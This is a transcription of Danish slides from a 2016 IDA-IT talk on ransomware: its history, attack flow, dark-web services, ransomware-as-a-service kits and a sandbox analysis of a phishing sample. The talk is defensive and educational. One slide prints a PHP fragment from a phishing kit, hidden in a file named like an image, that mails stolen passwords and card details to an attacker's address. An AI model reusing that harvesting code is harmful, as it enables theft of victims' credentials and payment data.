IDA-IT-2016-02-09-3 Jacob Herbst

Transcription

IDA-IT-2016-02-09-3 Jacob Herbst
Dagens trusselsbillede –
Ransomware – hvordan gør de?
Jacob Herbst, CTO, Dubex A/S
IDA-IT Gå-hjem-møde, den 9. februar 2016
Dubex A/S
Højt specialiserede it-sikkerhedseksperter
Managing risk –
Enabling growth
Eftertragtet arbejdsplads
Motiverede medarbejdere
Selvfinansierende og privatejet siden
1997
Kvalitet
Service
Kompetence
First mover
Konsulent- og sikkerhedsydelser
lokalt og globalt
Største it-sikkerhedspartner i
Danmark
16. bedste
arbejdsplads i
Danmark
5. bedste ITarbejdsplads i
Danmark
Hvad skal vi have ud af dette indlæg?
• Mine mål med dette indlæg er at give svar på følgende:
• Hvad er trends og tendenser i forhold til ransomware angreb?
• Hvad driver de angreb som vi oplever?
• Et indblik i nogen af de metoder som hackerne anvender
• Hvad kan vi gøre?
• Disclaimer: Sikkerhed er et meget stort emneområde, som er i konstant
forandring. I løbet af de næste 35 minutter, når vi højest at skrabe en lille
smule i overfladen.
Agenda
Hvad er tendenser og drivere?
Hvordan har ransomware udviklet sig?
Hvordan virker et ransomware angreb?
Hvad er Darkweb og hvad kan man finde der?
Hvad er fremtidsudsigterne?
Hvad vi kan gøre?
Angreb - aktuel status
Mål
Metoder
• Målrettede angreb efter fortrolige informationer
• Industrispionage
• Angreb, der omgår perimeterforsvaret
• Økonomisk berigelseskriminalitet
• Tyveri af kreditkortinformation
• Internetsvindel
• Afpresning – Ransomware og DDoS
Angribere
Spionage
Konkurrenter
Terrorisme
Politiske
Kriminelle
Cyberkrig
Angreb
• Angreb mod brugere
• Social engineering angreb f.eks. phishing
• Angreb via sociale netværk
• Webbaserede angreb
• Indirekte angreb rettet mod klienter
• Indirekte angreb via betroede eksterne
tredjeparter
• Angreb sløret i krypteret ssl-kommunikation
• Sårbarheder og avancerede dag-0-angreb
• Hurtig udnyttelse af sårbarheder
• Udnyttelse af ukendte sårbarheder – dag-0
• Unik og målrettet malware
Interne
Drivere bag cyberkriminalitet
Automatisering
Samarbejde og
vidensdeling
Anonymitet
Profit
Betalingsinfrastruktur
Avancerede angreb er blevet det normale
How Industrial Hackers Monetize the Opportunity
• Mange målrettede angreb er stadig forholdsvis
simple -- De fleste såkaldt avancerede angreb
starter stadig med en e-mail sendt til den rette
person med det rette indhold
• Cyber kriminalitet er en lukrativ forretning, og det
er nemt at starte
• Undergrundsmiljø hvor de kriminelle handler med
informationer
• Metoder som tidligere kun blev brugt i målrettede
angreb anvendes nu af almindelige kriminelle
• Malware er blevet mere avanceret
Source: RSA/CNBC
Social Security
$1
DDOS as a Service
~$7/hour
Credit Card Data
$0.25-$60
Medical Record
>$50
Bank Account Info
>$1000 (depending on account type and balance)
Mobile Malware
$150
Spam
$50/500K emails
Exploits
$1000-$300K
Malware Development
$2500
Facebook Account with
15 friends
$1
Malware - Udviklingsproces
Malware er vidt udbredt og kan fremstilles så det omgår
det traditionelle perimeterforsvar og anden beskyttelse
Sløring og kvalitetstestning
Original Malware
Permutationer
Kvalitetstestning
Afvist hvis detekteret
af anti-virus software
• Mange forskellige varianter af samme malware fremstilles
automatisk forud for et angreb
• Kun varianter, der kommer igennem kvalitetstestningen
(=omgår antivirus) bruges i selve angrebet
• De nye varianter frigives med jævne mellemrum for
konstant at være foran antivirus mønster opdateringerne
13.750
nye malware filer i timen
Deployering
Malware er unikt
YOU’RE ABSOLUTELY UNIQUE
— JUST LIKE EVERYONE ELSE
• “Consistent with some other recent vendor reports, we
found that 70 to 90% (depending on the source and
organization) of malware samples are unique to a single
organization.”
• “There’s another lesson here worth stating: Receiving a
never-before-seen piece of malware doesn’t mean it was
an “advanced” or “targeted” attack. It’s kinda cool to think
they handcrafted a highly custom program just for you, but
it’s just not true. Get over it and get ready for it. Special
snowflakes fall on every backyard.”
• “A quick look at the types of malware being used shows
they are overwhelmingly opportunistic and relatively shortlived. Even though we looked at data over just a six-month
period, 95% of the malware types showed up for less than
a month, while four out of five didn’t last beyond a week.”
Ransomware sager
Hændelser - Danmark
Menneskelig fejl kan være årsag til
cyberangreb mod kommuner
Angreb som det, der har ramt Gribskov kommune, skyldes oftest menneskelige fejl men Danmark kan være i sigtekornet netop nu, mener ekspert.
Af Mads Allingstrup / 22. JAN. 2015 KL. 12.27
Kommuner udsat for
hackerangreb
og afpresning
Af Jens Beck Nielsen og Henrik Jensen
22. januar 2015, 22:30
Flere kommuner er nu for første gang blevet angreb af hackere, som
kræver penge for at trække sig.
En voldsom aktivitet på Gribskov Kommunes drev afslørede mandag
eftermiddag, at kommunen for første gang var ramt af cyberangreb. Hackere
havde krypteret filer i kommunens systemer og forlangte penge for at slippe
kontrollen over dem. Kommunen afviste at betale og politianmeldte sagen, som
i går blev sendt videre til Europol. Foreløbig er der ikke noget, der tyder på, at
følsomme oplysninger om borgerne er sluppet ud, men kommunaldirektør
Holger Spangsberg Kristiansen understreger, at angrebet tages »meget,
meget alvorligt.«
To kommuner er ramt, men der er højst sandsynligt flere, som der ikke er
kendskab til endnu, forklarer Mads Nørgaard Madsen, sikkerhedsekspert og
partner i revisionsfirmaet PWC, der har været i kontakt med de ramte
kommuner.
Ifølge Mads Nørgaard Madsen skyder hackerne med spredehagl og krypterer
vilkårlige filer. Og ifølge ham er der altså ikke etale om målrettede forsøg på at
stjæle f.eks. personfølsomme oplysninger.»Det handler her om at lave så
meget ravage som muligt, så man kan kræve så mange penge som muligt. I
tilfældet her har hackerne henvendt sig via mail, og nogle brugere er kommet
til at hente en inficeret fil ned. Derfor handler det også om, at der kommer en
øget bevidsthed om sikkerheden. Uden at pege fingre kunne det måske have
imødegået disse angreb,« siger Mads Nørgaard Madsen.
Ond postvirus angriber
danske virksomheder
Mens Gribskov, Nordfyns og måske endnu flere kommuner netop nu kæmper med at slippe
fri af et nedrigt angreb mod deres IT-systemer, er der sansynligvis en eller flere ansatte i
kommunerne, der går rundt med røre øren
Ransomware-angreb skyldes nemlig oftest menneskelige fejl, hvor folk kommer til hente en
fil, de ikke skulle have hentet, eller klikker på et link eller en vedhæftet fil i en mail, der viser
sig at være inficeret.
Sådan lyder vurderingen fra direktør fra sikkerhedsorganisationen DK-Cert, Shehzad
Ahmad, der så sent som i sidste uge stod bag en rapport om danskernes IT-sikkerhed, hvor
Ransomware specifikt var nævnt som et stigende problem.
Ofte vedhæftede filer
- Man kan ikke udelukke, at dette er et målrettet angreb, men det vi normalt ser er, at det et
menneske, der selv sætter processen i gang. Det kan være en person i en
regnskabsafdeling, der har klikket på en tilsendt opgørelse, eller en person, der har klikket
på et link i en mail.
Ransomware er et af de mest nedrige typer af angreb, fordi den skadelige kode aktivt
forsøger at 'kapre' brugerens computer og kræver løsepenge for at slippe den fri igen. De
ekstra avancerede typer af ransomware krypterer sågar brugerens filer, eller bestemte
filtyper, fx Excel-ark med en meget hård kryptering, der ikke let kan brydes.
Herefter kræver bagmændene løsepenge for at låse computeren op - men selv om man
betaler, er det langt fra altid, at de faktisk holder deres løfte og sender nøglen, så man kan
få filerne fri.
http://www.dr.dk/nyheder/viden/tech/menneskelig-fejlkan-vaere-aarsag-til-cyberangreb-mod-kommuner
Mandag d. 28. september 2015, kl. 12.20 / Thomas Breinstrup
PostDanmark har politianmeldt virus, som foregiver at komme fra
postvæsenet, men som låser folks filer og kræver løsepenge.
En særdeles ondsindet computervirus, som udgiver sig for at komme fra
postvæsenet, spreder sig i Danmark og koder filer, så man ikke længere har
adgang til dem.
http://www.b.dk/nationalt/kommuner-udsat-for-hackerangreb-og-afpresning
PostDanmark advarer på sin
forside mod den falske besked,
som mange danskere har
modtaget, og som rummer en
farlig virus.
Sager i medierne
Ransomware
- Manglende patching førte til ransomware
- Tre måneder efter hackerangrebet er der stadig
eftervirkninger af det digitale indbrud og ekstraarbejde i
bogholderiet.
- Løsesummen lød på omkring 3.000 kroner, hvilket var tilpas
lavt, men kommunikationen med hackerne trak i langdrag.
De endte med at trække stikket på hele det gamle it-setup i
stedet.
-
Nu handler det derfor også om at
forberede sig på nye trusler.
-
»Man tror jo ikke, at det sker for en
selv. Men tro ikke, at det ikke sker
for dig. Nu er det ikke længere et
spørgsmål om, hvem der bliver
hacket, men hvornår man bliver
det.«
Sager i medierne
Målrettet
Udlandet…
“Between April 2014 and June 2015, the IC3
received 992 CryptoWall-related complaints, with
victims reporting losses totaling over $18 million.”
– FBI Security Bulletin, June 2015
Ransomware Evolution
• Clearly, ransomware attacks have increased in numbers over the last 5 years
• Many security reports talk about the sophistication and complexity of individual attacks
• The general public is left with the impression that we are faced with a new threat that is very difficult or
impossible to prevent
Udviklingen af ransomware
– lidt historie
Cyber afpresning
• Cyber afpresning er online kriminalitet, der
involverer et angreb eller trussel om angreb mod en
person eller virksomhed, kombineret med et krav
om betailing for at stoppe angrebet
Cyber extorsion
DDos
• Cyber pengeafpresning kan ske på flere måde kryptere data og holde den som gidsel, stjæle data
og truende eksponering, nægte adgang til data,
angribe systemer så de bliver utilgængelige
Ransomware
Blackmail
Volumetric:
Flooding
Encrytion
Ransomware
Computational
Asymmetric:
Consuming CPU
cycles
Locker Ransomware
Stateful
Asymmetric:
Abusing memory
Vulnerability-based:
Exploiting software
vulnerabilities
Blended DDoS:
Combination of
multiple attack
vectors
Release information
Ransomware History - AIDS
• The first known ransomware was the 1989 "AIDS" trojan
(also known as "PC Cyborg") written by Joseph Popp.
• PC CYBORG (AIDS Disk)
• Emerged in 1989.
• Distributed on floppy disks
• Installed from Trojan software
• Lay dormant to allow time for propagation
• Used operating basic encryption and operating
system quirks to “scramble” and hide files
• Demanded a “License Payment” to be sent via
cheque to a post office box in Panama
• Not very successful
• Technology was lagging behind the idea
Ransomware History – 1990s – 2000s
• Malware continued to develop 1990s – 2000s
• Identity theft
• Phishing scams, stealing passwords
• Bot Nets – Networks of compromised PCs
• Adware
• Ransomware 1990s-2000s
• Very small percent of Malware!
• Too complicated, how to get money?
• Too risky, how to stay hidden?
• Too weak, how to “Denial of Service” an uncontrolled PC?
(CC) BitDefender España (2010)
Source: https://www.flickr.com/photos/bitdefenderes/4292753852
• Occasional “fake” ransom, or Anti Virus, easily defeated / removed
• Occasional “locker” that affected boot process, easily defeated / removed
• 2005: PGPCoder Trojan – 1024 RSA key, collects money via EGOLD
Source: http://www.acma.gov.au/~/media/mediacomms/Social%20Media/Images/Ransomware%20Screenshot%20jpg.jpg
Ransomware History – 1990s – 2000s
• The ransomware concept dates back to 1989
• In 2010, something changed…
• In 2012, something changed, a lot!
• Technology has caught up to the idea!
• Step 1: Idea! Ransom money from people!
• Step 2: Use technology to enable the idea!
• Step 3: Profit…
• CTB-Locker stands for ‘Curve-Tor-Bitcoin‘- in reference to
core technologies:
• Curve - Strong encryption aka Elliptic Curve
Encryption, an extremely strong form of encryption
based on number theory
• Tor - Anonymity aka The Onion Router network, an
anonymized form of the Dark Interne
• Bitcoin – aka Untraceable crypto-cash payments the
virtual currency extorted from victims of the
ransomware (Invented 2009 by Satoshi Nakamoto)
Google search trends “ransomware” searches
2008 to 2015
Malware types - 2005 - 2015
Percentage of
new families
of misleading
apps, fake
AV, locker
ransomware
and crypto
ransomware
identified
between
2005 and
2015
Kilde: Symantec, The evolution of ransomware, august 2015
Reveton - Locker
• In 2012, ransomware worm known as Reveton began to spread
• It is also known as "police trojan"
• Its payload displays a warning from a law enforcement agency
• Claiming that the computer had been used for illegal activities,
such as downloading pirated software, promoting terrorism,
copyright etc.
• The warning informs the user that to unlock their system they
would have to pay a fine
• To increase the illusion that the computer is being tracked by law
enforcement, the screen also displays the computer's IP address
and footage from a computer's webcam
Lockers
Hvad er Crypto Ransomware?
• Crypto Ransomware tager ens data som gidsel
• Crypto Ransomware krypterer ens data, og tilbyder at sælge dig
nøglen til dekryptering
• Indtil for et års tid siden var de fleste crypto ransomware-angreb
temmelig harmløse, da den anvendte kryptering nemt kunne
fjernes
• Med Cryptolocker, Torrentlocker, CTBLocker o.lign. er dette dog
ændret …
Infektion
Malware
downloader
crypto
malware
Data bliver
krypteret
Besked om
betaling af
løsesum
inden udløb
af deadline
Betaling af
løsesum i
Bitcoins via
TOR
Evolution (examples)
Evolution of GPCode’s encryption
Evolution of Command and Control
• GPCode 2004
• Used one byte encryption key, easily defeated
• Electronic payments
• GPCode (2004)
• No C&C (C2) Server, just “did its thing”
• Contact malware producer via email for unlock
code
• GPCode.ac (June 2005)
• Implemented RSA Public Key Cryptography (PKI)
• Very weak key (56bit RSA modulus = 7 bit symmetric key)
• GPCode.ad (April 2006)
• Longer RSA keys but still poor PKI implementation
• GPCode.ag (June 2006)
• Finally, a strong RSA key (660 bit = ~60 bit symmetric)
• Cracked by Kaspersky, probably a coding error in .ag
• GPCode.ak (June 2008)
• Properly implemented 1024 bit RSA key
• Failed due to implementation of wrong “cipher”
• RC4, vulnerable to cryptanalysis
• GPCode.ax (December 2010) – A copycat…
• Unbreakable encryption
• … but still can be stopped (it has flaws)
• Reveton (2012)
• Doesn’t encrypt but uses C2 server for ‘unlock’
• Cryptolocker (2013)
• Uses C2 server, to retrieve RSA public key
(much more secure)
• Pseudo Random “Domain Generation
Algorithm” (DGA) to avoid easy takedowns
(contacts garbage URLs: xxgrradvvzcfyx.biz)
• Cryptowall (2014)
• Uses C2 server on TOR – hidden and
anonymous network!
• Improved DGA to make takedown even harder
Ransomware 2013/2014
September
2013
December
2013
CryptoLocker - first versions appear to have been
posted September 2013
• Usually enters the company by email.
• If a user clicks on the executable, it starts
immediately scanning network drives, renames
all the files & folders and encrypts them.
Locker – first copycat software emerged in
December 2013
• $150 to get the key, with money being
sent to a Perfect Money or QIWI Visa
Virtual Card number.
CryptoLocker 2.0 – a new and improved version of
CryptoLocker was found in December 2013
• CryptoLocker 2.0 was written using C# while the original
was in C++.
• Tor and Bitcoin used for anonymity and 2048-bit
encryption.
• The latest variant is not detected by anti-virus or firewall.
April
2014
CryptoWall – rebranded from CryptoDefense in April
2014
• Exploited a Java vulnerability.
• Malicious advertisements on domains belonging to
Disney, Facebook, The Guardian newspaper and
many others led people to sites that were CryptoWall
infected and encrypted their drives.
• According to an August 27 report from Dell
SecureWorks Counter Threat Unit (CTU): “CTU
researchers consider CryptoWall to be the largest
and most destructive ransomware threat on the
Internet as of this publication, and they expect this
threat to continue growing.”
• More than 600,000 systems were infected between
mid-March and August 24, with 5.25 billion files being
encrypted. 1,683 victims (0.27%) paid a total
$1,101,900 in ransom. Nearly 2/3 paid $500, but the
amounts ranged from $200 to $10,000.
CryptorBit – a new ransomware discovered in December 2013
• CryptorBit corrupts the first 1024 bytes of any data file it finds.
• Can bypass Group Policy settings put in place to defend against this type of ransomware
infection.
• Social engineering used to get end users to install the ransomware using such devices as a
fake flash update or a rogue antivirus product.
• Tor and Bitcoin again used for a ransom payment.
• Also installs crypto-coin mining software that uses the victim’s computer to mine digital
currency.
July
2014
August
2014
Cryptoblocker – new ransomware
variant emerged in July 201414
• only encrypt files <100MB and will skip
anything in Windows or Program
Files.15
• It uses AES rather than RSA
encryption.
SynoLocker – appeared in August 201411
• This one attacked Synology NAS
devices. SynoLocker encrypted files
one by one.
• Payment was in Bitcoins and again Tor
was used for anonymity.
CTB-Locker (Curve-Tor-Bitcoin
Locker) – discovered midsummer 2014
• First infections were mainly in
Russia. The developers were
thought to be from an eastern
European country.
Ransomware 2014/2015
December
2014
January
2015
February
2015
OphionLocker – surprise! Another ransomware
released during the holidays, December 2014
• ECC (elliptic curve cryptography) public-key
encryption.
• 3 days to pay the ransom or the private key
will be deleted.
Pclock – greets the New Year, January 2015 by
miming CryptoLocker17
• Files in a user’s profile are encrypted.
• Volume shadow copies are deleted and disabled.
• 72-hour countdown timer to pay 1 bitcoin in
ransom.
March
2015
…
September
2015
TeslaCrypt – a new CryptoWall variant
surfaced in February 2015
• Targets popular video game files such
as Call of Duty, MineCraft, World of
Warcraft, and Steam.
VaultCrypt – pretended to be customer
support in February 2015
• First circulated in Russia.
• Uses Windows batch files and open
source GnuPG privacy software for file
encryption.
CryptoWall 2.0 – ransomware goes on steroids in January 2015
• Delivered via email attachments, malicious pdf files and
various exploit kits.
• Encrypts the user’s data, until a ransom is paid for the
decryption key.
• Uses TOR to obfuscate the C&C (Command & Control)
channel.
• Incorporates anti-vm and anti-emulation checks to hamper
identification via sandboxes.
• Has the ability to run 64-bit code directly from its 32-bit
dropper. It can switch the processor execution context from 32
bit to 64 bit.
CryptoWall 3.0 – a new version
appeared March 2015
• I2P network communication.
• Uses exploit kits to gain privilege
escalation on the system.
• Disables many security features on a
target system.
October
2015
November
2015
LowLevel04 – this file-encrypting
ransomware greeted us in October
2015
• Also known as the Onion TrojanRansom
• Spreads via brute force attacks on
machines with Remote Desktop or
Terminal Services
• Encrypts files using AES encryption
but the encryption key itself is RSA
encrypted
Chimera – November 2015
• The hackers will publish the
encrypted files on the Internet if
the victim doesn’t pay!
CryptoWall 4.0 - 6 months later, in September
2015, a new variant is on the loose
• The most important change from
CryptoWall 3.0 to 4.0 is that it re-encrypts
filenames of the encrypted files, making it
more difficult to decipher which files need to
be recovered (filename scrambling)
• Obliterates restore points
• Improved network security evasion
Ransomware angreb
Typisk forløb for et Ransomware angreb
Phishing
angreb
En række
brugere
modtager
phising-mail
Angreb
Bruger åbner
vedlagt fil
eller tilgår
link
Malware
Download &
Kontakt
Udveksling
af nøgler
Kryptering
af data
Visning af
afpresning
(Betaling)
(Oplåsning
af filer)
Brugerens
maskine
inficeres
med malware
Crypto
ransomware
downloaded
Udveksling
af public /
private key
nøgler til
kryptering
Filerne på
den ramte
computer
bliver
krypteret
Offeret vises
besked med
deadline og
løsesum
Offeret
betaler
løsesum via
Tor
netværket
med Bitcoins
Offeret
modtager
nøgle til
dekryptering
af data
Malware
kontakter
Command &
Contol
Server
Cryptolocker
• Widely known variant of ransomware
• Distributed either as an attachment to a malicious e-mail, or is propagated
using the Gameover ZeuS botnet
• Began September 2013 / Rose to prominence in late 2013
• Encrypts certain types of files stored on local drives using RSA public-key
cryptography
• The private key stored only on the malware's control servers and it is
impossible to recover files without a key
• Offers to decrypt the data if a $300 ransom payment is made by a stated
deadline. Ransom increases after deadline.
• Threatens to delete the private key if the deadline passes.
• Goal is monetary via Bitcoin
• Dell SecureWorks estimates that CryptoLocker has infected 250,000 victims.
The average payout is $300 each
1 million dollars a day.
• $27 million in ransom in first 2 months (FBI)
• Defeated in early June 2014 when the Gameover botnet was knocked out in a
joint effort by various government agencies and security firms
• Decryption keys available for victims at www.decryptcryptolocker.com
Filename and Extensions Encrypted
.3fr
.7z*
.ai*
.apk
.arw
.avi
.bar
.bay
.bc6
.bc7
.big
.bik
.bkf
.bkp
.bsa
.cas
.cdr
.cer
.cfr
.cr2
.crt
.crw
.css
.csv
.das
.db, .db*
.dcr
.der
.dmp
.dng
.doc
.docx
.dwg
.dxg
.epk
.eps
.erf
.esm
.ff, .ff*
.flv
.fos
.fpk
.fsh
.gdb
.gho
.hkx
.itl
.itm
.iwd
.iwi
.jpe
.jpg
.js, .js*
.kdb
.kdc
.kf, .kf*
.lbf
.lrf
.ltx
.lvl
.m2, .m2*
.m3u
.m4a
.map
.mdb
.mdf
.mef
.mlx
.mov
.mp4
.ncf
.nrw
.ntl
.odb
.odc
.odm
.odp
.ods
.odt
.orf
.p12
.p7b
.p7c
.pak
.pdd
.pdf
.pef
.pem
.pfx
.png
.ppt
.pptx
.psd
.psk
.pst
.ptx
.py, .py*
.qdf
.qic
.r3d
.raf
.rar
.raw
.rb, .rb*
.re4
.rim
.rtf
.rw2
.rwl
.sav
.sb, .sb*
.sid
.sie
.sis
.slm
.snx
.sql
.sr2
.srf
.srw
.sum
.svg
.t12
.t13
.tax
.tor
.txt
.upk
.vcf
.vdf
.vpk
.vtf
.w3x
.wb2
.wma
.wmo
.wmv
.wpd
.wps
.x3f
.xf, .xf8
.xlk
.xls
.xlsx
.xxx
.zip
TeslaCrypt
Who pays the ransom?
Police department paid to decrypt images and
word documents
In the Australia, a Townsville sex shop paid
$1,058 to ransomware attackers.
FBI’s Advice on Ransomware? Just Pay The Ransom.
“The ransomware is that good,”
“To be honest, we often advise people just to
pay the ransom.”
“The easiest thing may be to just pay the
ransom,”
“The amount of money made by these criminals
is enormous and that’s because the
overwhelming majority of institutions just pay
the ransom.”
“Most ransomware scammers are good to their
word, You do get your access back.”
Joseph Bonavolonta, Assistant Special Agent in
Charge of FBI’s CYBER and Counter
intelligence Program, Boston
https://securityledger.com/2015/10/fbis-advice-on-cryptolocker-just-pay-the-ransom/
How many pay?
• It is surprising that approx. 9.7% of the respondents claim to have been victims of some sort of ransomware. This
figure is at least twice as high as the one we were expecting, judging from the scarce and quite speculative
previous literature. Most of the ransomware victims seemed to have chosen not to pay the ransom, but a very
high percentage of them indeed complied and sent the money to the cyber criminals. This percentage seems to
be around 41% for CryptoLocker and approx. 30% for other strands of ransomware (Icepol/Reveton, and many
others). This is at least 10 times more than the last previous estimation by Symantec of around a 3% of paying
victims (a previous one by the Dell SecureWorks CTU research team put this figure at 0.4%).
Data from a Jan 2014 survey by University of Kent
http://www.cybersec.kent.ac.uk/Survey2.pdf
Cryptolocker Mastermind
• According to the FBI, losses are “more than $100
million.”
• Bogachev is identified as a leader of a cyber gang of
criminals based in Russia and Ukraine that is
responsible both GameOver Zeus and Cryptolocker.
• Evgeniy Mikhailovich Bogachev
• Age 30
• Anapa, Russia
• Nickname “Slavik”
• Indicted for conspiracy, computer hacking, wire
fraud, bank fraud, and money laundering
Image source: FBI
Et angreb…
Dubex Security Analytics Center
• Overvågning af logfiler og alarmer fra bl.a.:
• Firewalls
• IDS/IPS systemer
• Webscanning
• Servere (Windows, Unix, databaser, web-servere, Active Directory m.m.)
• Lidt statistik fra 2015:
• Behandling af ”direkte” data fra over 10.000 enheder – indirekte fra mange flere via logs
fra firewall, IDS/IPS m.m.
• Opsamling og analyse af mere end 12 billioner loglinjer / hændelser
• Manuel gennemgang af mere end 3,5 mio. korrelerende alarmer
• Over 500 kvalificerede alarmer sendt ud til vores kunder
Typiske observationer
Interne systemer med
malware/trojanske heste
Phishing-angreb
Ransomware
Angreb mod web-servere
– sårbarheder, SQL
injection, Ransomware og
deface
Bruteforce password
cracking
Scanning efter SIP
services
Mistænkelig trafik
Uautoriseret trafik
Andet – skanninger
Aktuel Ransomware
Eksempel på phishing mail
• Slutbruger modtager phising mail med link til falsk
hjemmeside
• Siden er ”beskyttet” med CAPTCHA formentlig for at
beskytte mod automatisk analyse
Fil download
• Slutbrugeren downloader derefter automatisk en
ZIP fil der hedder ”forsendelse_20310.zip”
• Filen indeholder reelt en EXE fil, som har fået
tilknyttet et PDF logo for at ligne en PDF fil
Sandbox analyse
• Sandbox er en overvåget kopi af vores
klient miljø, hvor malware kan køres og
observeres, men vil ikke forårsage
skade på selve systemet
• Sandbox bruges til dynamisk malware
analyse og adfærd baseret detektion
Analyse af ondsindet fil
Ændring af mail opsætning
Autorun tilføjelse & sløring af filen
Kopiering til %windir% kataloget
Unik ikke kendt fil
Sletning af shadow kopier
Tilgang til ”malware” domæne
Etablering af bagdør
Opslag på egen DNS Server
Virus bliver kun langsomt kendt af antivirus softwaren
En anden lidt nyere variant – også unik…
Krypterede filer
Instruktion i betaling – med hjælp til Bitcoins via Youtube
Bitcoin adressen er unik
TOR - Kombination af flere ”mixes”
• Målsætning: Etablering af en infrastruktur, der ikke er
sårbar over for trafikanalyse
• Koncept: Kombination af mixes og proxies
• Anvender public-key til etablering af forbindelser
• Anvender symmetriske nøgler til kommunikation
• Samme koncept som kendes fra SSL/TLS
proxies
• Anvendelse af flere mixes for at sikre et varieret
netværk
• Mixes (blandere)
• Modtager krypteret input fra forskellige
afsendere
• De-kryptering og videresendelse sker tilfældigt
• En iagttager kan ikke se, hvilket output der
svarer til hvilket input
• Blot en enkelt server fungerer korrekt og ikke er
kompromitteret vil anonymiteten være i behold
• Ulempe: Dyr og langsom public key kryptering
A
B
A
C
B
C
C
B
C
A
B
A
???
Umuligt at
afgøre hvilken
meddelelse der
kommer fra
hvilken afsender
Hvordan kommer man på Tor netværket?
What is the Dark Web used for? (2015)
TOP 5
Guns, bullets and weapons
Booom ?
Drugs
Need a Drivers license ?
Stepstones and rooted servers
RDP, VNC, NX you name it..
Remote Desktop Access
Bots and Botnets
Zeus Botnet
for only $7.56
Access via proxy, socks, and to loaders and phishing..
The Dark Forums.
Hacking the hackers
Inside many of the
folders were files
like “css.gif”
…and it was not
an image!
Behind the codes - Hackers hacking hackers..
$zaz = 'reszult@yahoo.com';
PSW : $theAccountPW
…
CardHolder : $chold
CardNumber : $cnum
ExpiryDate : $exp
CVC : $cvv
$subject = "RZ # $date # $time";
$headers = "From: VbV Full Info<EMAIL-REMOVED@yahoo.fr>";
$headers .= $_POST['eMailAdd']."\n";
mail($zaz,$subject,$log,$headers);
Dropping files
Virus maker kits for free (backdoored)
TOX – Free Ransomware Toolkit
Ransomware as a service.
TOX – Free Ransomware Toolkit
• 'Tox' Offers Free build-your-own Ransomware
Malware Toolkit.
• Tox is completely free to use.
• One dark web hacker has released this for anyone to
download and set up their own ransomware for free.
• Tox, which runs on TOR, requires not much technical
skills to use.
• It is designed in such a way that almost anyone can
easily deploy ransomware in three simple steps.
• Once a user register with the site, follow these three
simple steps to creating your own malware:
• Type a desired ransom amount you want to ask
victims for.
• Provide an additional note in the "Cause", the
message that will alert victims that they are being
held hostage to a piece of malware.
• Finally, you are prompted to fill out a captcha, and
click "Create".
"This process creates an executable of about 2MB that is disguised as a
.scr file. Then the Tox [users] distribute and install as they see fit. The Tox
site (runs on the TOR network) will track the installs and profit. To withdraw
funds, you need only supply a receiving Bitcoin address.“
- McAfee explains..
RaaS - Next generation ”Ransomware as a service”
Cryptolocker/CTB-Locker/CryptoWall etc..
4.61299511 Bitcoins ~= 10.000DKK
Kilde: http://malware.dontneedcoffee.com
Cryptolocker/CTB-Locker/CryptoWall etc..
Countrys
D
a
t
e
http://malware.dontneedcoffee.com
Cryptolocker/CTB-Locker/CryptoWall etc..
Kilde: http://malware.dontneedcoffee.com
When sharing becomes too much…
• In mid-August Turkish security group Otku Sen published open
source code for ransomware “Hidden Tear” on github
• Hidden Tear uses AES encryption and can evade common AV
platforms
• Otku Sen also published a short video demonstrating how
ransomware worked.
While this may be helpful for some, there are significant
risks. Hidden tear may be used only for Educational
Purposes. Do not use it as a ransomware! You could go to
jail on obstruction of justice charges just for running
hidden tear, even though you are innocent.
• … but
• Not everyone on the internet obey this warning
• Trend Micro discovered a hacked website in Paraguay
• Distributing ransomware detected as
RANSOM_CRYPTEAR.B.
• Ransomware was created using a modified Hidden Tear
code
http://blog.trendmicro.rsvp1.com/trendlabs-security-intelligence/a-case-of-too-much-informationransomware-code-shared-publicly-for-educational-purposes-used-maliciously-anyway
http://www.trendmicro.rsvp1.com/vinfo/us/threat-encyclopedia/malware/ransom_cryptear.b
Hvad er udviklingen omkring Ransomware? (1/2)
Aktuel status og tendenser
• Aktuelle data viser, at næsten 70% af hændelser rammer små og mellemstore virksomheder, efterfulgt af store
virksomheder og private – dog er der formentlig et stort antal mørke tal i statistikken
• Flere forskellige filtyper end tidligere bliver ramt – dette for at ramme flere samt ramme særlige filtyper med stor
værdi for offeret – fx filer med gemte spil hos gamere og CAD-tegninger i en ingeniørvirksomhed eller tegnestue
• Krypto-ransomware er blevet mere virksomhedsrettet – tidligere var det primært rettet mod private, men nyere
udgaver går efter ”professionelle” filtyper, netværksdrev (fx CryptoFortress) og kræver en højere løsesum
• Ransomware med ”netværksorm” funktionalitet dvs. spredning internt i virksomhederne til alle servere og klienter
– potentiale for meget større skade og afpresning af større beløb
• Tyveri af data med efterfølgende afpresning under trussel om offentliggørelse på af personlige og følsomme data
på Internettet
• Kriminelle (Cyber mafia) vil målrettet angribe konsulent virksomheder og myndigheder med ransomware og
afpresse store beløb fra organisationer, der ikke ønsker deres forretning forstyrret eller deres intellektuelle
ejendom kompromitteret
• De fleste krypto-ransomware kalder sig CryptoLocker – simpelthen for at bruge det ”brand” navn som
Cryptelocker har fået opbygget
Hvad er udviklingen omkring Ransomware? (2/2)
Aktuel status og tendenser
• Filnavne krypteres så det bliver mere vanskeligt at se hvad der er blevet
krypteret. Unik krypteringsnøgle for hver fil
• Krypto-ransomware er gået "freemium." Afkod et par filer gratis for at
overbevise ofrene om, at de rent faktisk får adgang til deres data, hvis de
betaler
• ”Offline” kryptering dvs. krypteringen kan starte uden klienten har Internet
adgang
• Nyere Cryptolocker sletter Volule Shadow kopier (Windows indbyggede
backup funktion), således at offeret ikke kan genskabe data den vej igennem
• Nye sovende og slørede ransomware varianter der i skjul krypterer data
• Tillader stadig adgang til data
• Der ventes indtil en backup er foretaget (så backuppen også indeholder
krypterede data).
• Derefter fjernes krypteringsnøglen og der kræves en (meget stor)
løsesum
• Ransomware-as-a-service hostet på TOR-netværket og brug af Bitcoin til
løsepenge betaling gør det muligt nemt at starte som cyber kriminel
Ransomware attacks doubled in 2015
Over half (54%) of all malware
targeting UK users in 2015 contained
some form of ransomware.
Ransom32: Javascript-only Ransomware-as-a-Service (RaaS)
• Fully developed in JavaScript, HTML and CSS
using NW.js (http://nwjs.io/)
• Potentially allows for multi-platform infections after
repackaging for Linux and MacOS X
• Do not confuse Java and JavaScript
• Java - object oriented programming language,
originally developed by Sun and now owned
by Oracle
• JavaScript - object oriented client-side
All you need to get your own customized ransomware is a
scripting language that is implemented in the
Bitcoin address to send your earnings to
browser
• NW.js bundle node.js, standard JavaScript scripts,
and Chromium into a single executable
• Chrome executes and launches the JavaScript
scripts
• The malware package is a self-extracting RAR
file of 22MB which expands to over 67MB
• NW.js is a legitimate framework so antivirus
signature coverage very bad
• No administrative rights necessary.
• Runs under the security context of the user
